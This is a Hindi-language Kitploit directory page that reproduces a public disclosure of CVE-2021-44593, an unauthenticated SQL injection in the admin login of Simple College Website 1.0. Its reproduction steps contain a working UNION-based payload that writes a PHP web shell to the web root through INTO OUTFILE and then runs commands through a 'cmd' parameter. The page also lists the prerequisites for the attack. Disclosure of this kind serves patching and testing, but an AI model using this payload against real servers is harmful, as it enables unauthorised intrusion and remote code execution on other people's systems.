Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44593 — # CVE-2021-44593 का सार्वजनिक खुलासा और विवरण, Simple College Website में एक अनधिकृत SQL इंजेक्शन जो मनमाने फ़ाइल अपलोड और रिमोट कोड निष्पादन की ओर ले जाता है। | Kitploit
उपकरण/GitHubGitHub/mister-joe/cve-2021-44593
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

# CVE-2021-44593 का सार्वजनिक खुलासा और विवरण, Simple College Website में एक अनधिकृत SQL इंजेक्शन जो मनमाने फ़ाइल अपलोड और रिमोट कोड निष्पादन की ओर ले जाता है।

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44593

CVE-2021-44593 का सार्वजनिक खुलासा। Simple College Website में SQL इंजेक्शन/मनमाना फ़ाइल अपलोड/रिमोट कोड निष्पादन भेद्यता।

विवरण

Simple College Website 1.0 /admin/login.php पृष्ठ के "username" पैरामीटर में एक बिना प्रमाणीकरण वाले union-आधारित SQL इंजेक्शन के प्रति संवेदनशील है, जिसका उपयोग मनमानी फ़ाइलें अपलोड करने और रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।

प्रभावित घटक

admin_class.php में login() फ़ंक्शन

पुनरुत्पादन के चरण

  1. एडमिन लॉगिन पृष्ठ तक पहुँचें (आमतौर पर /admin/login.php)
  2. लॉगिन फ़ॉर्म को POST पैरामीटर "username" के साथ सबमिट करें जिसमें निम्नलिखित UNION-आधारित SQL इंजेक्शन हो:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. /testing.php?cmd=id पर नेविगेट करें

नोट्स

  1. वेब सर्वर रूट डायरेक्टरी स्थान का ज्ञान आवश्यक है।
  2. यदि दस्तावेज़ रूट डायरेक्टरी वेब सर्वर रूट डायरेक्टरी के समान नहीं है, तो दस्तावेज़ रूट डायरेक्टरी स्थान का ज्ञान भी आवश्यक हो सकता है।
  3. इसके अलावा, MySQL डेमॉन के पास उक्त डायरेक्टरी के लिए लेखन अनुमतियाँ होनी चाहिए।
टूल डाउनलोड करें